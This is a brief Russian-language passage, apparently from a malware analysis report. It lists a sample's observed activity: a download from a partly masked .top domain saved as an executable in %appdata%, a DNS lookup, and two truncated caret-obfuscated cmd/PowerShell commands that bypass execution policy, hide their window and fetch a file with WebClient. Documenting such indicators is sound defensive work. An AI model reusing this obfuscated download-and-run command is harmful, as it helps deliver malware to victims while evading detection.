Техническая информация
- http://fo###repu.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^er^Sh^Ell.E^Xe -ExECuti^O^n^p^o^Licy^ by^P^aS^s^ ^-n^OPROfiL^E^ -wind^O^W^s^tyl^E ^Hi^Dde^n (NE^w-Ob^JEct sy^stem.N^e^T^.^We^B^cLieN^t).D^OW^nLO^a^D^fILe^(^'http://fo###...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "POW^er^Sh^Ell.E^Xe -ExECuti^O^n^p^o^Licy^ by^P^aS^s^ ^-n^OPROfiL^E^ -wind^O^W^s^tyl^E ^Hi^Dde^n (NE^w-Ob^JEct sy^stem.N^e^T^.^We^B^cLieN^t).D^OW^nLO^a^D^fILe^(^'http://fo###...' (со скрытым окном)